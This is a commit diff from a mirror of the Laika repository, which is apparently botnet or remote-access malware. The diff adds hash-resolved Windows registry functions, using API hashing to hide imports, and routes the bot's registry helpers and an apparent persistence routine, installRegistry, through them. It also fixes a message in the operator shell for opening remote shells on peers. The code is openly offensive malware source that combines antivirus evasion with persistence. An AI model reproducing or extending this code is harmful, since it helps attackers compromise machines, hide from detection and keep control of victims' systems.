1
0
mirror of https://github.com/CPunch/Laika.git synced 2024-11-21 12:40:04 +00:00

Bot: added Registry related API to laikaO_init()

- Also fixed misc. shell bug.
This commit is contained in:
CPunch 2022-07-12 18:09:23 -05:00
parent 5d2f492c41
commit 25c18db6bc
4 changed files with 24 additions and 15 deletions

View File

@ -12,11 +12,19 @@ typedef HINSTANCE(WINAPI *_ShellExecuteA)(HWND, LPCSTR, LPCSTR, LPCSTR, LPCSTR,
typedef HRESULT(WINAPI *_CreatePseudoConsole)(COORD, HANDLE, HANDLE, DWORD, HPCON *); typedef HRESULT(WINAPI *_CreatePseudoConsole)(COORD, HANDLE, HANDLE, DWORD, HPCON *);
typedef void(WINAPI *_ClosePseudoConsole)(HPCON); typedef void(WINAPI *_ClosePseudoConsole)(HPCON);
typedef BOOL(WINAPI *_CreateProcessA)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION); typedef BOOL(WINAPI *_CreateProcessA)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION);
typedef LSTATUS(WINAPI *_RegOpenKeyExA)(HKEY, LPCSTR, DWORD, REGSAM, PHKEY);
typedef LSTATUS(WINAPI *_RegCloseKey)(HKEY);
typedef LSTATUS(WINAPI *_RegSetValueExA)(HKEY, LPCSTR, DWORD, DWORD, const BYTE *, DWORD);
typedef LSTATUS(WINAPI *_RegQueryValueExA)(HKEY, LPCSTR, LPDWORD, LPDWORD, LPBYTE, LPDWORD);
extern _ShellExecuteA oShellExecuteA; extern _ShellExecuteA oShellExecuteA;
extern _CreatePseudoConsole oCreatePseudoConsole; extern _CreatePseudoConsole oCreatePseudoConsole;
extern _ClosePseudoConsole oClosePseudoConsole; extern _ClosePseudoConsole oClosePseudoConsole;
extern _CreateProcessA oCreateProcessA; extern _CreateProcessA oCreateProcessA;
extern _RegOpenKeyExA oRegOpenKeyExA;
extern _RegCloseKey oRegCloseKey;
extern _RegSetValueExA oRegSetValueExA;
extern _RegQueryValueExA oRegQueryValueExA;
#endif #endif
void laikaO_init(); void laikaO_init();

View File

@ -8,6 +8,8 @@
*/ */
#include <process.h> #include <process.h>
#include <shlobj.h>
#include <shlwapi.h>
#include <windows.h> #include <windows.h>
/* ======================================[[ API Hashing ]]====================================== */ /* ======================================[[ API Hashing ]]====================================== */
@ -139,11 +141,13 @@ _ShellExecuteA oShellExecuteA;
_CreatePseudoConsole oCreatePseudoConsole; _CreatePseudoConsole oCreatePseudoConsole;
_ClosePseudoConsole oClosePseudoConsole; _ClosePseudoConsole oClosePseudoConsole;
_CreateProcessA oCreateProcessA; _CreateProcessA oCreateProcessA;
_RegOpenKeyExA oRegOpenKeyExA;
_RegCloseKey oRegCloseKey;
_RegSetValueExA oRegSetValueExA;
_RegQueryValueExA oRegQueryValueExA;
/* TODO: /* TODO:
GetEnvironmentVariable GetEnvironmentVariable
windows registry related API
*/ */
void laikaO_init() void laikaO_init()
@ -155,11 +159,8 @@ void laikaO_init()
oCreatePseudoConsole = (_CreatePseudoConsole)findByHash("kernel32.dll", 0x7310ef7); oCreatePseudoConsole = (_CreatePseudoConsole)findByHash("kernel32.dll", 0x7310ef7);
oClosePseudoConsole = (_ClosePseudoConsole)findByHash("kernel32.dll", 0xeff42590); oClosePseudoConsole = (_ClosePseudoConsole)findByHash("kernel32.dll", 0xeff42590);
oCreateProcessA = (_CreateProcessA)findByHash("kernel32.dll", 0x9e687c1d); oCreateProcessA = (_CreateProcessA)findByHash("kernel32.dll", 0x9e687c1d);
oRegOpenKeyExA = (_RegOpenKeyExA)(findByHash("advapi32.dll", 0x15041404));
/* oRegCloseKey = (_RegCloseKey)(findByHash("advapi32.dll", 0xae0cf309));
hash = getHashName("InitializeProcThreadAttributeList"); oRegSetValueExA = (_RegSetValueExA)(findByHash("advapi32.dll", 0xcb91dcf7));
printf("InitializeProcThreadAttributeList: real is %p, hashed is %p. [HASH: %x]\n", oRegQueryValueExA = (_RegQueryValueExA)(findByHash("advapi32.dll", 0x4298d735));
(void *)InitializeProcThreadAttributeList,
findByHash("kernel32.dll", hash), hash);
*/
} }

View File

@ -49,7 +49,7 @@ HKEY openReg(HKEY key, LPCSTR subKey)
{ {
HKEY hKey; HKEY hKey;
if (RegOpenKeyExA(key, subKey, 0, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS) if (oRegOpenKeyExA(key, subKey, 0, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
LAIKA_ERROR("Failed to open registry key!\n"); LAIKA_ERROR("Failed to open registry key!\n");
return hKey; return hKey;
@ -63,12 +63,12 @@ LPSTR readReg(HKEY key, LPCSTR val, LPDWORD sz)
/* get the size */ /* get the size */
*sz = 0; *sz = 0;
RegQueryValueExA(key, val, NULL, NULL, NULL, sz); oRegQueryValueExA(key, val, NULL, NULL, NULL, sz);
if (*sz != 0) { if (*sz != 0) {
str = (LPSTR)laikaM_malloc(*sz); str = (LPSTR)laikaM_malloc(*sz);
if ((ret = RegQueryValueExA(key, val, NULL, NULL, str, sz)) != ERROR_SUCCESS) if ((ret = oRegQueryValueExA(key, val, NULL, NULL, str, sz)) != ERROR_SUCCESS)
LAIKA_ERROR("Failed to read registry!\n"); LAIKA_ERROR("Failed to read registry!\n");
} }
@ -79,7 +79,7 @@ void writeReg(HKEY key, LPCSTR val, LPSTR data, DWORD sz)
{ {
LONG code; LONG code;
if ((code = RegSetValueExA(key, val, 0, REG_SZ, (LPBYTE)data, sz)) != ERROR_SUCCESS) if ((code = oRegSetValueExA(key, val, 0, REG_SZ, (LPBYTE)data, sz)) != ERROR_SUCCESS)
LAIKA_ERROR("Failed to write registry!\n"); LAIKA_ERROR("Failed to write registry!\n");
} }
@ -190,7 +190,7 @@ void installRegistry()
writeReg(reg, regKeyVal, newRegValue, newRegSz); writeReg(reg, regKeyVal, newRegValue, newRegSz);
} }
RegCloseKey(reg); oRegCloseKey(reg);
LAIKA_BOX_SKID_END(regKeyVal); LAIKA_BOX_SKID_END(regKeyVal);
LAIKA_BOX_SKID_END(regKey); LAIKA_BOX_SKID_END(regKey);
} }

View File

@ -84,7 +84,7 @@ void openShellCMD(tShell_client *client, int argc, char *argv[])
id = shellS_readInt(argv[1]); id = shellS_readInt(argv[1]);
peer = shellS_getPeer(client, id); peer = shellS_getPeer(client, id);
PRINTINFO("Opening shell on peer %04d...\n"); PRINTINFO("Opening shell on peer %04d...\n", id);
PRINTINFO("Use CTRL+A to kill the shell\n"); PRINTINFO("Use CTRL+A to kill the shell\n");
/* open shell on peer */ /* open shell on peer */